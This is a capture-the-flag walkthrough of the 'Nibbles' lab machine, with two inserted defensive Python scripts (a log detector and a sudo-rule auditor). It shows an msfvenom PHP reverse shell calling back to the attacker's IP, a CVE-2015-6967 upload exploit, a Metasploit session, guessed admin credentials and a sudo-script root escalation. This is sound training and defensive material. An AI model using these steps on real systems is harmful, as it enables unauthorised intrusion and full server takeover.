Recon
nmap
nmap -A -sV -Pn 10.10.10.75
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We are faced with a website that simply displays "Hello world!".
gobuster
No results from gobuster: I was not able to find any directories or files.
After some time, I searched whether Nibbles or Nibble was a web service or application that I did not know about. I found that Nibbleblog is a blog engine written in PHP.
We can then find the link to the main page at: http://10.10.10.75/nibbleblog/
Screenshot of the nibbleblog page
We retry the gobuster scan.
===============================================================
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
===============================================================
Vulnerabilities
Thanks to exploitdb, we can see that there are 2 vulnerabilities listed for Nibbleblog.
└─$ searchsploit nibble
-------------------------------------------------------------------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
-------------------------------------------------------------------------------------------
One of these vulnerabilities has been assigned CVE-2015-6967. I found an exploit on GitHub, let's try it!
Exploit
For the exploit, we need to provide:
- url
- username
- password
- payload
Navigating through the directories, I found a users.xml file that contains one user, here admin.
Trying some default and guessed passwords on the admin login page http://10.10.10.75/nibbleblog/admin.php, I found the credentials admin:nibbles.
For the payload, I used msfvenom to create a PHP reverse shell, then passed it to the Python script.
# creating our php reverse shell payload
└─$ msfvenom -p php/reverse_php LHOST=10.10.16.6 LPORT=4444 > shell.php
└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.
The exploit seems to be successful. We can see that an image has been uploaded; it is our reverse shell.
We simply go to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to get our shell. Don't forget to listen with netcat on the port specified in the payload.
We got a shell! We are connected as the user nibbler, so we can now get the user flag.
whoami
nibbler
cat /home/nibbler/user.txt
*************************7564559
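What this chain looks like from the server side, as an added example that is not part of the original writeup: a small Python detector over Apache access-log lines (combined log format is assumed; the log lines are constructed from the requests described above, with the client address 10.10.16.6 taken from the msfvenom command). It flags any request for a .php file below content/private/, on the assumption that the content/ tree should hold uploaded data and never executable scripts, and raises the severity when the same client has already POSTed to admin.php earlier in the log.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Apache "combined" access-log format is assumed; the log lines below are
# constructed for this example from the requests described in the writeup.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: nothing under content/private/ should ever be a PHP script, so a
# request for one is suspicious on its own.
SCRIPT_IN_CONTENT = re.compile(r'/nibbleblog/content/private/.*\.php(?:$|\?)')

# Constructed sample log (timestamps and sizes are made up).
SAMPLE_LOG = """\
10.10.16.6 - - [05/Aug/2022:22:05:10 +0200] "GET /nibbleblog/README HTTP/1.1" 200 4628 "-" "Mozilla/5.0"
10.10.16.6 - - [05/Aug/2022:22:05:40 +0200] "POST /nibbleblog/admin.php HTTP/1.1" 302 0 "-" "python-requests/2.28"
10.10.16.6 - - [05/Aug/2022:22:06:30 +0200] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.2 - - [05/Aug/2022:22:07:00 +0200] "GET /nibbleblog/ HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
"""


@dataclass
class Alert:
    ip: str
    ts: str
    path: str
    severity: str


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Flag requests for PHP scripts under content/private/.

    Severity is 'high' when the same client has already POSTed to admin.php
    (the admin login / plugin upload endpoint), 'medium' otherwise.
    """
    alerts = []
    posted_to_admin = defaultdict(bool)  # ip -> seen an admin.php POST earlier
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec['method'] == 'POST' and rec['path'].startswith('/nibbleblog/admin.php'):
            posted_to_admin[rec['ip']] = True
        if SCRIPT_IN_CONTENT.search(rec['path']):
            severity = 'high' if posted_to_admin[rec['ip']] else 'medium'
            alerts.append(Alert(rec['ip'], rec['ts'], rec['path'], severity))
    return alerts


if __name__ == '__main__':
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity}] {a.ip} at {a.ts} requested {a.path}")
```

Running it on the sample reports a single high-severity alert for 10.10.16.6; the README fetch and the unrelated client are ignored. In production the same rule is cheaper to enforce than to detect: a directory directive that disables PHP execution under content/ stops the uploaded file from running at all.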
We can also load the multi/http/nibbleblog_file_upload module in the Metasploit console and set our options.
Name | Value
USERNAME | admin
PASSWORD | nibbles
TARGETURI | /nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
[*] Started reverse TCP handler on 10.10.XX.X:4444
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.XX.X:4444 -> 10.10.10.75:37934) at 2022-08-05 22:06:44 +0200
We are now in! Let’s continue to the privesc.
Privesc
Checking the user's sudo privileges, we can see that nibbler can run the script monitor.sh in the directory /home/nibbler/personal/stuff/ as root.
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
We just have to invoke a shell through that file.
$ mkdir -p /home/nibbler/personal/stuff/
$ echo "/bin/bash" > monitor.sh
$ chmod +x monitor.sh
$ sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
*************************0da949e
We are now system owner!
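The defensive lesson of this privesc is the sudo rule itself: it points at a file inside the user's own home directory, and the directory did not even exist yet (hence the mkdir -p), so the user fully controls what runs as root. Below is a small audit script, added here as an example and not part of the original writeup, that parses sudo -l output and flags such rules. The input is the sudo -l text shown above plus one constructed benign rule for contrast; the home-directory location is assumed to be /home/<user>.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the "sudo -l" output from the writeup, plus one made-up
# benign rule so the audit has something to leave alone.
SUDO_L_OUTPUT = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: command, command" as printed by sudo -l
RULE_RE = re.compile(r'^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')


@dataclass
class Finding:
    command: str
    runas: str
    reasons: list = field(default_factory=list)


def audit_sudo_output(user, text, home=None):
    """Return findings for sudo rules the named user could abuse.

    A rule is flagged when its command lives under the user's home directory
    (user-controlled, creatable if missing), uses a wildcard, or is ALL.
    NOPASSWD is recorded as an aggravating factor on flagged rules.
    """
    home = (home or f'/home/{user}').rstrip('/')
    findings = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(f'User {user} may run'):
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(':') for t in m.group('tags').split()}
        for spec in m.group('cmds').split(','):
            spec = spec.strip()
            if not spec:
                continue
            path = spec.split()[0]
            reasons = []
            if path == home or path.startswith(home + '/'):
                reasons.append("command path is inside the user's home directory, "
                               "so the user controls (or can create) the file")
            if '*' in spec:
                reasons.append('wildcard in command specification')
            if spec == 'ALL':
                reasons.append('unrestricted ALL')
            if reasons and 'NOPASSWD' in tags:
                reasons.append('NOPASSWD: no authentication needed to trigger it')
            if reasons:
                findings.append(Finding(spec, m.group('runas'), reasons))
    return findings


if __name__ == '__main__':
    for f in audit_sudo_output('nibbler', SUDO_L_OUTPUT):
        print(f"{f.command} (as {f.runas}):")
        for r in f.reasons:
            print(f"  - {r}")
```

On the sample input only the monitor.sh rule is reported, with both the home-directory and the NOPASSWD reasons; the systemctl rule passes because its binary sits on a root-owned path. The fix on the host is the mirror image of the check: keep sudo targets on root-owned, non-writable paths and drop NOPASSWD where it is not strictly needed.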
Easy, External, Nibbleblog, Penetration Tester Level 1, CVE Exploitation, CVE-2015-6967, A06:2021-Vulnerable And Outdated Components, User Enumeration, Sudo Exploitation, Public Vulnerabilities, Security Tools